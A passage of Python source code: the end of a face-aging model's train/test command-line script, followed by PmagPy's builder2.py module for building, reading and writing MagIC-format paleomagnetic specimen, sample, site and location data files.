Save trained model at the end of every epoch and remove the saved model of the previous epoch{br}' '\tUse this option if you don\'t have a lot of free memory and removing large binary files is a cheap operation.{br}' '\tnever: Don\'t save trained model{br}' '\tUse this option if you only wish to collect statistics and validation results.{br}' 'All options except \'never\' will also save when interrupted by the user.'.format(br=os.linesep) ) parser.add_argument('--batch-size', '--bs', dest='batch_size', default=64, type=int) parser.add_argument('--weight-decay', '--wd', dest='weight_decay', default=1e-5, type=float) parser.add_argument('--learning-rate', '--lr', dest='learning_rate', default=2e-4, type=float) parser.add_argument('--b1', '-b', dest='b1', default=0.5, type=float) parser.add_argument('--b2', '-B', dest='b2', default=0.999, type=float) parser.add_argument('--shouldplot', '--sp', dest='sp', default=False, type=bool) # test params parser.add_argument('--age', '-a', required=False, type=int) parser.add_argument('--gender', '-g', required=False, type=str_to_gender) parser.add_argument('--watermark', '-w', action='store_true') # shared params parser.add_argument('--cpu', '-c', action='store_true', help='Run on CPU even if CUDA is available.') parser.add_argument('--load', '-l', required=False, default=None, help='Trained models path for pre-training or for testing') parser.add_argument('--input', '-i', default=None, help='Training dataset path (default is {}) or testing image path'.format(default_train_results_dir())) parser.add_argument('--output', '-o', default='') parser.add_argument('-z', dest='z_channels', default=50, type=int, help='Length of Z vector') args = parser.parse_args() consts.NUM_Z_CHANNELS = args.z_channels net = model.Net() if not args.cpu and torch.cuda.is_available(): net.cuda() if args.mode == 'train': betas = (args.b1, args.b2) if args.load is None else None weight_decay = args.weight_decay if args.load is None else None lr = args.learning_rate if args.load is None else None if args.load is not None: net.load(args.load) print("Loading pre-trained models from {}".format(args.load)) data_src = args.input or consts.UTKFACE_DEFAULT_PATH print("Data folder is {}".format(data_src)) results_dest = args.output or default_train_results_dir() os.makedirs(results_dest, exist_ok=True) print("Results folder is {}".format(results_dest)) with open(os.path.join(results_dest, 'session_arguments.txt'), 'w') as info_file: info_file.write(' '.join(sys.argv)) log_path = os.path.join(results_dest, 'log_results.log') if os.path.exists(log_path): os.remove(log_path) logging.basicConfig(filename=log_path, level=logging.DEBUG) net.teach( utkface_path=data_src, batch_size=args.batch_size, betas=betas, epochs=args.epochs, weight_decay=weight_decay, lr=lr, should_plot=args.sp, where_to_save=results_dest, models_saving=args.models_saving ) elif args.mode == 'test': if args.load is None: raise RuntimeError("Must provide path of trained models") net.load(path=args.load, slim=True) results_dest = args.output or default_test_results_dir() if not os.path.isdir(results_dest): os.makedirs(results_dest) image_tensor = pil_to_model_tensor_transform(pil_loader(args.input)).to(net.device) net.test_single( image_tensor=image_tensor, age=args.age, gender=args.gender, target=results_dest, watermark=args.watermark ) pmagpy/builder2.py #!/usr/bin/env python """ Module for building or reading in specimen, sample, site, and location data. 
""" from __future__ import print_function import os from builtins import str from builtins import range from builtins import object import pmagpy.pmag as pmag import pmagpy.validate_upload2 as validate_upload class ErMagicBuilder(object): """ more object oriented builder """ def __init__(self, WD, data_model=None): self.WD = WD self.measurements = [] self.specimens = [] self.samples = [] self.sites = [] self.locations = [] self.results = [] self.write_ages = False self.ancestry = [None, 'specimen', 'sample', 'site', 'location', None] # self.double = ['magic_method_codes', 'specimen_description', 'sample_description', 'site_description'] # self.incl_pmag_data = set(['result']) if not data_model: self.data_model = validate_upload.get_data_model() else: self.data_model = data_model self.data_lists = {'specimen': [self.specimens, Specimen, self.add_specimen], 'sample': [self.samples, Sample, self.add_sample], 'site': [self.sites, Site, self.add_site], 'location': [self.locations, Location, self.add_location], 'age': [self.sites, Site, self.add_site], 'result': [self.results, Result, self.add_result], 'measurement': [self.measurements, Measurement, self.add_measurement]} self.add_methods = {'specimen': self.add_specimen, 'sample': self.add_sample, 'site': self.add_site, 'location': self.add_location, 'age': None, 'result': self.add_result} self.update_methods = {'specimen': self.change_specimen, 'sample': self.change_sample, 'site': self.change_site, 'location': self.change_location, 'age': self.change_age, 'result': self.change_result} self.delete_methods = {'specimen': self.delete_specimen, 'sample': self.delete_sample, 'site': self.delete_site, 'location': self.delete_location, 'age': None, 'result': self.delete_result} # actual is at position 0, reqd is at position 1, optional at position 2 self.headers = { 'measurement': {'er': [[], [], []], 'pmag': [[], [], []]}, 'specimen': {'er': [[], [], []], 'pmag': [[], [], []]}, 'sample': {'er': [[], [], []], 'pmag': [[], [], []]}, 'site': {'er': [[], [], []], 'pmag': [[], [], []]}, 'location': {'er': [[], [], []], 'pmag': [[], [], []]}, 'age': {'er': [[], [], []], 'pmag': [[], [], []]}, 'result': {'er': [[], [], []], 'pmag': [[], [], []]} } self.first_age_headers = ['er_citation_names', 'magic_method_codes', 'age_unit'] self.age_type = 'site' def make_name_list(self, obj_list): name_list = [] for obj in obj_list: try: name_list.append(obj.name) except AttributeError: if obj: name_list.append(obj) else: name_list.append('') return name_list def get_name(self, pmag_object, *args): for arg in args: try: pmag_object = pmag_object.__getattribute__(arg) except AttributeError: return '' return pmag_object def find_by_name(self, item_name, items_list, name_list=None): """ Return item from items_list with name item_name. """ if not name_list: names = [item.name for item in items_list if item] else: names = name_list if item_name in names: ind = names.index(item_name) return items_list[ind] return False def find_or_create_by_name(self, item_name, items_list, item_type): """ See if item with item_name exists in item_list. If not, create that item. Either way, return an item of type item_type. """ item = self.find_by_name(item_name, items_list) if not item: item = self.data_lists[item_type][2](item_name, None) return item def init_default_headers(self): """ initialize default required headers. if there were any pre-existing headers, keep them also. 
""" if not self.data_model: self.data_model = validate_upload.get_data_model() if not self.data_model: print("Can't access MagIC-data-model at the moment.\nIf you are working offline, make sure MagIC-data-model.txt is in your PmagPy directory (or download it from https://github.com/ltauxe/PmagPy and put it in your PmagPy directory).\nOtherwise, check your internet connection") return False # actual is at position 0, reqd is at position 1, optional at position 2 self.headers['measurement']['er'][1], self.headers['measurement']['er'][2] = self.get_headers('magic_measurements') self.headers['specimen']['er'][1], self.headers['specimen']['er'][2] = self.get_headers('er_specimens') self.headers['sample']['er'][1], self.headers['sample']['er'][2] = self.get_headers('er_samples') self.headers['site']['er'][1], self.headers['site']['er'][2] = self.get_headers('er_sites') self.headers['location']['er'][1], self.headers['location']['er'][2] = self.get_headers('er_locations') self.headers['age']['er'][1], self.headers['age']['er'][2] = self.get_headers('er_ages') self.headers['result']['pmag'][1], self.headers['result']['pmag'][2] = self.get_headers('pmag_results') self.headers['specimen']['pmag'][1], self.headers['specimen']['pmag'][2] = self.get_headers('pmag_specimens') self.headers['sample']['pmag'][1], self.headers['sample']['pmag'][2] = self.get_headers('pmag_samples') self.headers['site']['pmag'][1], self.headers['site']['pmag'][2] = self.get_headers('pmag_sites') def get_headers(self, data_type): try: data_dict = self.data_model[data_type] except KeyError: return [], [] reqd_headers = sorted([header for header in list(data_dict.keys()) if data_dict[header]['data_status'] == 'Required']) optional_headers = sorted([header for header in list(data_dict.keys()) if data_dict[header]['data_status'] != 'Required']) return reqd_headers, optional_headers def init_actual_headers(self): def headers(data_list, reqd_er_headers, reqd_pmag_headers): if data_list: er_header, pmag_header = set([]), set([]) for item in data_list: for key in list(item.er_data.keys()): er_header.add(key) for key in list(item.pmag_data.keys()): pmag_header.add(key) ## old non-thorough way #er_header = data_list[0].er_data.keys() #pmag_header = data_list[0].pmag_data.keys() er_header = remove_list_headers(er_header) pmag_header = remove_list_headers(pmag_header) else: er_header = remove_list_headers(reqd_er_headers) pmag_header = remove_list_headers(reqd_pmag_headers) return list(er_header), list(pmag_header) self.headers['measurement']['er'][0], self.headers['measurement']['pmag'][0] = headers(self.measurements, self.headers['measurement']['er'][1], self.headers['measurement']['pmag'][1]) self.headers['specimen']['er'][0], self.headers['specimen']['pmag'][0] = headers(self.specimens, self.headers['specimen']['er'][1], self.headers['specimen']['pmag'][1]) self.headers['sample']['er'][0], self.headers['sample']['pmag'][0] = headers(self.samples, self.headers['sample']['er'][1], self.headers['sample']['pmag'][1]) self.headers['site']['er'][0], self.headers['site']['pmag'][0] = headers(self.sites, self.headers['site']['er'][1], self.headers['site']['pmag'][1]) self.headers['location']['er'][0], self.headers['location']['pmag'][0] = headers(self.locations, self.headers['location']['er'][1], self.headers['location']['pmag'][1]) age_list = self.data_lists[self.age_type][0] if age_list: age_headers = [] for item in age_list: for header in list(item.age_data.keys()): if header not in age_headers: age_headers.append(header) 
self.headers['age']['er'][0] = age_headers else: self.headers['age']['er'][0] = remove_list_headers(self.headers['age']['er'][1]) # make sure that some recommended but not required age headers are added in for head in self.first_age_headers: if head not in self.headers['age']['er'][0]: self.headers['age']['er'][0].append(head) self.headers['result']['er'][0], self.headers['result']['pmag'][0] = headers(self.results, self.headers['result']['er'][1], self.headers['result']['pmag'][1]) def add_measurement(self, exp_name, meas_num, spec_name=None, er_data=None, pmag_data=None): """ Find actual data object for specimen. Then create a measurement belonging to that specimen and add it to the data object """ specimen = self.find_by_name(spec_name, self.specimens) measurement = Measurement(exp_name, meas_num, specimen, er_data) self.measurements.append(measurement) return measurement def change_specimen(self, old_spec_name, new_spec_name, new_sample_name=None, new_er_data=None, new_pmag_data=None, replace_data=False): """ Find actual data objects for specimen and sample. Then call Specimen class change method to update specimen name and data. """ specimen = self.find_by_name(old_spec_name, self.specimens) if not specimen: print('-W- {} is not a currently existing specimen, so cannot be updated'.format(old_spec_name)) return False if new_sample_name: new_sample = self.find_by_name(new_sample_name, self.samples) if not new_sample: print("""-W- {} is not a currently existing sample. Creating a new sample named: {} """.format(new_sample_name, new_sample_name)) new_sample = self.add_sample(new_sample_name) else: new_sample = None specimen.change_specimen(new_spec_name, new_sample, new_er_data, new_pmag_data, replace_data) return specimen def delete_specimen(self, spec_name): """ Remove specimen with name spec_name from self.specimens. If the specimen belonged to a sample, remove it from the sample's specimen list. """ specimen = self.find_by_name(spec_name, self.specimens) if not specimen: return False sample = specimen.sample if sample: sample.specimens.remove(specimen) self.specimens.remove(specimen) del specimen return [] def add_specimen(self, spec_name, samp_name=None, er_data=None, pmag_data=None): """ Create a Specimen object and add it to self.specimens. If a sample name is provided, add the specimen to sample.specimens as well. """ if samp_name: sample = self.find_by_name(samp_name, self.samples) if not sample: print("""-W- {} is not a currently existing sample. Creating a new sample named: {} """.format(samp_name, samp_name)) sample = self.add_sample(samp_name) else: sample = None specimen = Specimen(spec_name, sample, self.data_model, er_data, pmag_data) self.specimens.append(specimen) if sample: sample.specimens.append(specimen) return specimen def change_sample(self, old_samp_name, new_samp_name, new_site_name=None, new_er_data=None, new_pmag_data=None, replace_data=False): """ Find actual data objects for sample and site. Then call Sample class change method to update sample name and data.. """ sample = self.find_by_name(old_samp_name, self.samples) if not sample: print('-W- {} is not a currently existing sample, so it cannot be updated'.format(old_samp_name)) return False if new_site_name: new_site = self.find_by_name(new_site_name, self.sites) if not new_site: print("""-W- {} is not a currently existing site. 
Adding site named: {}""".format(new_site_name, new_site_name))#sample.site or '*empty*', sample) new_site = self.add_site(new_site_name) else: new_site = None sample.change_sample(new_samp_name, new_site, new_er_data, new_pmag_data, replace_data) return sample def add_sample(self, samp_name, site_name=None, er_data=None, pmag_data=None): """ Create a Sample object and add it to self.samples. If a site name is provided, add the sample to site.samples as well. """ if site_name: site = self.find_by_name(site_name, self.sites) if not site: print("""-W- {} is not a currently existing site. Creating a new site named: {} """.format(site_name, site_name)) site = self.add_site(site_name) else: site = None sample = Sample(samp_name, site, self.data_model, er_data, pmag_data) self.samples.append(sample) if site: site.samples.append(sample) return sample def delete_sample(self, sample_name, replacement_samp=None): """ Remove sample with name sample_name from self.samples. If the sample belonged to a site, remove it from the site's sample list. If the sample had any specimens, change specimen.sample to "". """ sample = self.find_by_name(sample_name, self.samples) if not sample: return False specimens = sample.specimens site = sample.site if site: site.samples.remove(sample) self.samples.remove(sample) for spec in specimens: spec.sample = "" return specimens def change_age(self, old_name, new_age_data=None, item_type='site', replace_data=False): item = self.find_by_name(old_name, self.data_lists[item_type][0]) if replace_data: default_age_data = {key: '' for key in self.headers['age']['er'][1]} item.age_data = combine_dicts(new_age_data, default_age_data) else: item.age_data = combine_dicts(new_age_data, item.age_data) return item def change_site(self, old_site_name, new_site_name, new_location_name=None, new_er_data=None, new_pmag_data=None, replace_data=False): """ Find actual data objects for site and location. Then call the Site class change method to update site name and data. """ site = self.find_by_name(old_site_name, self.sites) if not site: print('-W- {} is not a currently existing site, so it cannot be updated.'.format(old_site_name)) return False if new_location_name: if site.location: old_location = self.find_by_name(site.location.name, self.locations) if old_location: old_location.sites.remove(site) new_location = self.find_by_name(new_location_name, self.locations) if not new_location: print("""-W- {} is not a currently existing location. Adding location with name: {}""".format(new_location_name, new_location_name)) new_location = self.add_location(new_location_name) new_location.sites.append(site) else: new_location = None ## check all declinations/azimuths/longitudes in range 0=>360. #for key, value in new_er_data.items(): # new_er_data[key] = pmag.adjust_to_360(value, key) site.change_site(new_site_name, new_location, new_er_data, new_pmag_data, replace_data) return site def add_site(self, site_name, location_name=None, er_data=None, pmag_data=None): """ Create a Site object and add it to self.sites. If a location name is provided, add the site to location.sites as well. """ if location_name: location = self.find_by_name(location_name, self.locations) if not location: location = self.add_location(location_name) else: location = None ## check all declinations/azimuths/longitudes in range 0=>360. 
#for key, value in er_data.items(): # er_data[key] = pmag.adjust_to_360(value, key) new_site = Site(site_name, location, self.data_model, er_data, pmag_data) self.sites.append(new_site) if location: location.sites.append(new_site) return new_site def delete_site(self, site_name, replacement_site=None): """ Remove site with name site_name from self.sites. If the site belonged to a location, remove it from the location's site list. If the site had any samples, change sample.site to "". """ site = self.find_by_name(site_name, self.sites) if not site: return False self.sites.remove(site) if site.location: site.location.sites.remove(site) samples = site.samples for samp in samples: samp.site = '' del site return samples def change_location(self, old_location_name, new_location_name, new_parent_name=None, new_er_data=None, new_pmag_data=None, replace_data=False): """ Find actual data object for location with old_location_name. Then call Location class change method to update location name and data. """ location = self.find_by_name(old_location_name, self.locations) if not location: print('-W- {} is not a currently existing location, so it cannot be updated.'.format(old_location_name)) return False location.change_location(new_location_name, new_er_data, new_pmag_data, replace_data) return location def add_location(self, location_name, parent_name=None, er_data=None, pmag_data=None): """ Create a Location object and add it to self.locations. """ if not location_name: return False location = Location(location_name, data_model=self.data_model, er_data=er_data, pmag_data=pmag_data) self.locations.append(location) return location def delete_location(self, location_name): """ Remove location with name location_name from self.locations. If the location had any sites, change site.location to "". 
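        Example (hypothetical name; assumes a location called 'location_1' exists in builder.locations):
            orphaned_sites = builder.delete_location('location_1')
            # each returned site now has site.location == ''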
""" location = self.find_by_name(location_name, self.locations) if not location: return False sites = location.sites self.locations.remove(location) for site in sites: if site: site.location = '' del location return sites def add_age(self, item_name, age_data): items_list = self.data_lists[self.age_type][0] item = self.find_by_name(item_name, items_list) if not item: msg = '-W- You have tried to add age data for {}, but there is no {} by that name'.format(item_name, self.age_type) print(msg) return False else: required = {key: '' for key in self.headers['age']['er'][1]} item.age_data = combine_dicts(age_data, required) self.write_ages = True def delete_age(self, item_name): pass def add_result(self, result_name, spec_names=None, samp_names=None, site_names=None, loc_names=None, pmag_data=None): specimens, samples, sites, locations = None, None, None, None if spec_names: specimens = [self.find_by_name(name, self.specimens) for name in spec_names] if samp_names: samples = [self.find_by_name(name, self.samples) for name in samp_names] if site_names: sites = [self.find_by_name(name, self.sites) for name in site_names] if loc_names: locations = [self.find_by_name(name, self.locations) for name in loc_names] result = Result(result_name, specimens, samples, sites, locations, pmag_data, self.data_model) self.results.append(result) return result def delete_result(self, result_name): result = self.find_by_name(result_name, self.results) if result: self.results.remove(result) del result def change_result(self, old_result_name, new_result_name, new_er_data=None, new_pmag_data=None, spec_names=None, samp_names=None, site_names=None, loc_names=None, replace_data=False): """ Find actual data object for result with old_result_name. Then call Result class change method to update result name and data. """ result = self.find_by_name(old_result_name, self.results) if not result: msg = '-W- {} is not a currently existing result, so it cannot be updated.'.format(old_result_name) print(msg) return False else: specimens, samples, sites, locations = None, None, None, None if spec_names: specimens = [self.find_or_create_by_name(spec, self.specimens, 'specimen') for spec in spec_names] if samp_names: samples = [self.find_or_create_by_name(samp, self.samples, 'sample') for samp in samp_names] if site_names: sites = [self.find_or_create_by_name(site, self.sites, 'site') for site in site_names] if loc_names: locations = [self.find_or_create_by_name(loc, self.locations, 'location') for loc in loc_names] result.change_result(new_result_name, new_pmag_data, specimens, samples, sites, locations, replace_data) return result ## Methods for reading in data def get_data(self): """ attempt to read measurements file in working directory. """ meas_file = os.path.join(self.WD, 'magic_measurements.txt') if not os.path.isfile(meas_file): print("-I- No magic_measurements.txt file") return {} try: meas_data, file_type = pmag.magic_read(meas_file) except IOError: print("-I- No magic_measurements.txt file") return {} if file_type == 'bad_file': print("-E- ERROR: Can't read magic_measurements.txt file. 
File is corrupted.") old_specimen_name = '' #start_time = time.time() meas_name_list = [measurement.name for measurement in self.measurements] for rec in meas_data: # get citation information citation = rec.get('er_citation_names', 'This study') if 'This study' not in citation: citation = citation.strip() + ':This study' er_data = {'er_citation_names': citation} pmag_data = {'er_citation_names': 'This study'} specimen_name = rec["er_specimen_name"] # ignore measurement if there is no specimen if specimen_name == "" or specimen_name == " ": continue # if we've moved onto a new specimen, make sure a sample/site/location # exists for that specimen if specimen_name != old_specimen_name: sample_name = rec["er_sample_name"] site_name = rec["er_site_name"] location_name = rec["er_location_name"] # add items and parents location = self.find_by_name(location_name, self.locations) if location_name and not location: location = self.add_location(location_name, er_data=er_data, pmag_data=pmag_data) site = self.find_by_name(site_name, self.sites) if site_name and not site: site = self.add_site(site_name, location_name, er_data, pmag_data) sample = self.find_by_name(sample_name, self.samples) if sample_name and not sample: sample = self.add_sample(sample_name, site_name, er_data, pmag_data) specimen = self.find_by_name(specimen_name, self.specimens) if specimen_name and not specimen: specimen = self.add_specimen(specimen_name, sample_name, er_data, pmag_data) # add child_items if sample and not self.find_by_name(specimen_name, sample.specimens): sample.specimens.append(specimen) if site and not self.find_by_name(sample_name, site.samples): site.samples.append(sample) if location and not self.find_by_name(site_name, location.sites): location.sites.append(site) exp_name = rec['magic_experiment_name'] meas_num = rec['measurement_number'] meas_name = exp_name + '_' + str(meas_num) measurement = self.find_by_name(meas_name, self.measurements, meas_name_list) if not measurement: self.add_measurement(exp_name, meas_num, specimen.name, rec) meas_name_list.append(meas_name) old_specimen_name = specimen_name #end_time = time.time() - start_time def get_all_magic_info(self): self.get_data() for child, parent in [('specimen', 'sample'), ('sample', 'site'), ('site', 'location'), ('location', '')]: print('-I- Getting {} info'.format(child)) self.get_magic_info(child, parent, 'er') if self.get_magic_info(child, parent, 'pmag'): self.incl_pmag_data.add(child) self.get_age_info() self.get_results_info() def get_magic_info(self, child_type, parent_type=None, attr='er', filename=None, sort_by_file_type=False): """ Read er_*.txt or pmag_*.txt file. If no filename is provided, use er_* or pmag_* file in WD. If sort_by_file_type, use file header to determine child, parent types, instead of passing those in as arguments. Once file is open, parse information into dictionaries for each item. If the item does not yet exist, add it to the builder data object. Then add info to the item object as object.er_data or object.pmag_data. 
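        Example (a hypothetical call; assumes er_specimens.txt is present in the working directory):
            builder.get_magic_info('specimen', 'sample', attr='er')
            # reads WD/er_specimens.txt and attaches each row to the matching Specimen as er_data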
""" parent = '' grandparent_type = None magic_name = 'er_' + child_type + '_name' expected_item_type = child_type if not filename: short_filename = attr + '_' + child_type + 's.txt' magic_file = os.path.join(self.WD, short_filename) else: short_filename = os.path.split(filename)[1] magic_file = filename attr = short_filename.split('_')[0] print('-I- Attempting to read {}'.format(magic_file)) if not os.path.isfile(magic_file): print('-W- Could not find {}'.format(magic_file)) return False # get the data from the appropriate .txt file data_dict, header, file_type = self.read_magic_file(magic_file, magic_name, sort_by_file_type=sort_by_file_type) if not data_dict: print('-W- Could not read in file: {}.\n Make sure it is a MagIC-format file'.format(magic_file)) return False item_type = file_type.split('_')[1][:-1] # if a file was named wrong, use the type of data that is actually in that file if item_type != expected_item_type: print('-W- Expected data of type: {} but instead got: {}'.format(expected_item_type, item_type)) print('-W- Using type: {}'.format(item_type)) if item_type == 'age': self.get_age_info(filename) return 'age' child_type = item_type magic_name = 'er_' + child_type + '_name' ind = self.ancestry.index(child_type) parent_type = self.ancestry[ind+1] if item_type != 'location': grandparent_type = self.ancestry[ind+2] else: grandparent_type = '' if not grandparent_type: ind = self.ancestry.index(child_type) try: grandparent_type = self.ancestry[ind+2] except IndexError: grandparent_type = None child_list, child_class, child_constructor = self.data_lists[child_type] if parent_type: parent_list, parent_class, parent_constructor = self.data_lists[parent_type] else: parent_list, parent_name = None, None for child_name in data_dict: # if there is a possible parent, try to find parent object in the data model if parent_type: parent_name = data_dict[child_name].get('er_' + parent_type + '_name', '') parent = self.find_by_name(parent_name, parent_list) if parent: remove_dict_headers(parent.er_data) remove_dict_headers(parent.pmag_data) # if there should be a parent # (meaning there is a name for it and the child object should have a parent) # but none exists in the data model, go ahead and create that parent object. 
if parent_name and parent_type and not parent: # try to get grandparent grandparent = None grandparent_name = None if grandparent_type: grandparent_list, grandparent_class, grandparent_constructor = self.data_lists[grandparent_type] grandparent_name = data_dict[child_name]['er_' + grandparent_type + '_name'] grandparent = self.find_by_name(grandparent_name, grandparent_list) if grandparent_name and not grandparent: grandparent = grandparent_constructor(grandparent_name, None) parent = parent_constructor(parent_name, grandparent_name) # otherwise there is no parent and none can be created, so use an empty string elif not parent: parent_name = None parent = '' child = self.find_by_name(child_name, child_list) # if the child object does not exist yet in the data model if not child: child = child_constructor(child_name, parent_name) else: # bind parent to child and child to parent if parent: child.set_parent(parent) if parent and (child not in parent.children): parent.add_child(child) # add in the appropriate data dictionary to the child object if attr == 'er': self.update_methods[child_type](child_name, child_name, parent_name, new_er_data=data_dict[child_name]) else: self.update_methods[child_type](child_name, child_name, parent_name, new_pmag_data=data_dict[child_name]) # old way #child.__setattr__(attr + '_data', data_dict[child_name]) remove_dict_headers(child.er_data) remove_dict_headers(child.pmag_data) # return child_type def get_age_info(self, filename=None): """ Read er_ages.txt file. Parse information into dictionaries for each site/sample. Then add it to the site/sample object as site/sample.age_data. """ # use filename if provided, otherwise find er_ages.txt in WD if not filename: short_filename = 'er_ages.txt' magic_file = os.path.join(self.WD, short_filename) else: magic_file = filename if not os.path.isfile(magic_file): print('-W- Could not find {}'.format(magic_file)) return False data_dict, header, file_type = self.read_magic_file(magic_file, 'by_line_number') # if provided file is not an age_file, # try to read it in as whatever type of file it actually is if file_type != 'er_ages': item_type = file_type.split('_')[1][:-1] self.get_magic_info(item_type, filename=filename, sort_by_file_type=True) return file_type # if it is an age file, # determine level for each age and assign it to the appropriate pmag object for item_dict in list(data_dict.values()): item_type = None for dtype in ['specimen', 'sample', 'site', 'location']: header_name = 'er_' + dtype + '_name' if header_name in list(item_dict.keys()): if item_dict[header_name]: item_type = dtype item_name = item_dict[header_name].strip() break if not item_type: print('-W- You must provide a name for your age') print(' These data:\n{}\n will not be imported'.format(item_dict)) continue items_list = self.data_lists[item_type][0] item = self.find_by_name(item_name, items_list) if not item: ## the following code creates any item in er_ages that does not exist already ## however, we may not WANT that behavior print("""-I- A {} named {} in your age file was not found in the data object: Now initializing {} {}""".format(item_type, item_name, item_type, item_name)) ind = self.ancestry.index(item_type) parent_type = self.ancestry[ind+1] parent_header, parent_constructor = None, None if parent_type: parent_list, parent_class, parent_constructor = self.data_lists[parent_type] parent_header = 'er_' + parent_type + '_name' parent_name = item_dict.get(parent_header, '') parent = self.find_by_name(parent_name, parent_list) # if the 
parent item doesn't exist, and should, create it if parent_name and not parent: print("""-I- A {} named {} in your age file was not found in the data object: Now initializing {} {}""".format(parent_type, parent_name, parent_type, parent_name)) parent = parent_constructor(parent_name, None) item_constructor = self.data_lists[item_type][2] if not parent: parent_name = None item = item_constructor(item_name, parent_name) # add the age data to the object item.age_data = remove_dict_headers(item_dict) # note that data is available to write self.write_ages = True return file_type def get_results_info(self, filename=None): """ Read pmag_results.txt file. Parse information into dictionaries for each item. Then add it to the item object as object.results_data. """ if not filename: short_filename = "pmag_results.txt" magic_file = os.path.join(self.WD, short_filename) else: magic_file = filename if not os.path.isfile(magic_file): print('-W- Could not find {} in your working directory {}'.format(short_filename, self.WD)) return False # get the data from the pmag_results.txt file data_dict = self.read_magic_file(magic_file, 'by_line_number')[0] def make_items_list(string, search_items_list): names = string.split(':') items = [] for name in names: name = name.strip(' ') item = self.find_by_name(name, search_items_list) if item: items.append(item) return items for num, result in list(data_dict.items()): name, specimens, samples, sites, locations = None, None, None, None, None for key, value in list(result.items()): #print key, ':', value if key == 'er_specimen_names': specimens = make_items_list(value, self.specimens) if key == 'er_sample_names': samples = make_items_list(value, self.samples) if key == 'er_site_names': sites = make_items_list(value, self.sites) if key == 'er_location_names': locations = make_items_list(value, self.locations) if key == 'pmag_result_name': name = value for header_name in ['er_specimen_names', 'er_site_names', 'er_sample_names', 'er_location_names']: if header_name in list(result.keys()): result.pop(header_name) if not name: name = num result_item = self.find_by_name(name, self.results) if not result_item: result_item = Result(name, specimens, samples, sites, locations, result, self.data_model) else: print('-W- Two or more results with name: {} found in your result file.\n Taking only the first.'.format(name)) if result_item and result_item not in self.results: self.results.append(result_item) def read_magic_file(self, path, sort_by_this_name, sort_by_file_type=False): """ read a magic-formatted tab-delimited file. 
return a dictionary of dictionaries, with this format: {'Z35.5a': {'specimen_weight': '1.000e-03', 'er_citation_names': 'This study', 'specimen_volume': '', 'er_location_name': '', 'er_site_name': 'Z35.', 'er_sample_name': 'Z35.5', 'specimen_class': '', 'er_specimen_name': 'Z35.5a', 'specimen_lithology': '', 'specimen_type': ''}, ....} """ DATA = {} with open(path, 'r') as fin: lines = list(fin.readlines()) first_line = lines[0] if not first_line: return False, None, 'empty_file' if first_line[0] == "s" or first_line[1] == "s": delim = ' ' elif first_line[0] == "t" or first_line[1] == "t": delim = '\t' else: print('-W- error reading ', path) return False, None, 'bad_file' file_type = first_line.strip('\n').split(delim)[1] if sort_by_file_type: item_type = file_type.split('_')[1][:-1] if item_type == 'age': sort_by_this_name = "by_line_number" else: sort_by_this_name = 'er_' + item_type + '_name' line = lines[1] header = line.strip('\n').split(delim) counter = 0 for line in lines[2:]: tmp_data = {} tmp_line = line.strip('\n').split(delim) for i in range(len(header)): if i < len(tmp_line): tmp_data[header[i]] = tmp_line[i].strip() else: tmp_data[header[i]] = "" if sort_by_this_name == "by_line_number": DATA[counter] = tmp_data counter += 1 else: if tmp_data[sort_by_this_name] != "": DATA[tmp_data[sort_by_this_name]] = tmp_data return DATA, header, file_type def write_measurements_file(self): filename = os.path.join(self.WD, 'magic_measurements.txt') magic_outfile = open(filename, 'w') measurement_headers = self.headers['measurement']['er'][0] measurement_headers[:0] = ['er_specimen_name', 'er_sample_name', 'er_site_name', 'er_location_name', 'magic_experiment_name', 'measurement_number'] specimen_names = self.make_name_list(self.specimens) meas_strings = [] for meas in self.measurements: meas_string = [] # if a specimen has been deleted, # do not record any measurements for that specimen if not meas.specimen.name in specimen_names or not meas.specimen.name: continue for header in measurement_headers: if header == 'er_specimen_name': val = self.get_name(meas, 'specimen', 'name') elif header == 'er_sample_name': val = self.get_name(meas, 'specimen', 'sample', 'name') elif header == 'er_site_name': val = self.get_name(meas, 'specimen', 'sample', 'site', 'name') elif header == 'er_location_name': val = self.get_name(meas, 'specimen', 'sample', 'site', 'location', 'name') elif header == 'magic_experiment_name': val = meas.experiment_name elif header == 'measurement_number': val = meas.meas_number else: val = meas.er_data.get(header, '') meas_string.append(val) meas_string = '\t'.join(meas_string) meas_strings.append(meas_string) # write data to file magic_outfile.write('tab\tmagic_measurements\n') header_string = '\t'.join(measurement_headers) magic_outfile.write(header_string + '\n') for string in meas_strings: magic_outfile.write(string + '\n') magic_outfile.close() return True ### Methods for writing data ### def write_files(self): """ write all data out into er_* and pmag_* files as appropriate """ warnings = self.validate_data() print('-I- Writing all saved data to files') if self.measurements: self.write_measurements_file() for dtype in ['specimen', 'sample', 'site']: if self.data_lists[dtype][0]: do_pmag = dtype in self.incl_pmag_data self.write_magic_file(dtype, do_er=True, do_pmag=do_pmag) if not do_pmag: pmag_file = os.path.join(self.WD, 'pmag_' + dtype + 's.txt') if os.path.isfile(pmag_file): os.remove(pmag_file) if self.locations: self.write_magic_file('location', do_er=True, 
do_pmag=False) self.write_age_file() if self.results: self.write_result_file() if warnings: print('-W- ' + str(warnings)) return False, warnings return True, None def write_magic_file(self, dtype, do_er=True, do_pmag=True): if dtype == 'location': do_pmag = False # make header add_headers = [] self.ancestry_ind = self.ancestry.index(dtype) for i in range(self.ancestry_ind, len(self.ancestry) - 1): add_headers.append('er_' + self.ancestry[i] + "_name") er_actual_headers = sorted(self.headers[dtype]['er'][0]) pmag_actual_headers = sorted(self.headers[dtype]['pmag'][0]) # clean up pmag header: write pmag method code header without '++' for pmag_head in pmag_actual_headers[:]: if '++' in pmag_head: pmag_actual_headers.remove(pmag_head) pmag_actual_headers.append(pmag_head[:-2]) er_full_headers = add_headers[:] er_full_headers.extend(er_actual_headers) pmag_full_headers = add_headers[:] pmag_full_headers.extend(pmag_actual_headers) er_start = 'er_' + dtype + 's' pmag_start = 'pmag_' + dtype + 's' er_strings = [] pmag_strings = [] # get sorted list of all relevant items items_list = sorted(self.data_lists[dtype][0], key=lambda item: item.name) # fill in location begin/end lat/lon if those values are not present if dtype == 'location': d = self.get_min_max_lat_lon(items_list) for item in items_list[:]: for header in ['location_begin_lat', 'location_begin_lon', 'location_end_lat', 'location_end_lon']: if not item.er_data[header]: item.er_data[header] = d[item.name][header] # go through items and collect necessary data for item in items_list[:]: # get an item's ancestors ancestors = self.get_ancestors(item) er_string = [] pmag_string = [] # if item has no pmag_data at all, do not write it to pmag_file do_this_pmag = True temp_pmag_data = list(item.pmag_data.values()) if 'This study' in temp_pmag_data: temp_pmag_data.remove('This study') if not any(temp_pmag_data): do_this_pmag = False # compile er data if do_er: er_string.append(item.name) for ancestor in ancestors: er_string.append(ancestor) for key in er_actual_headers: try: add_string = str(item.er_data[key]) 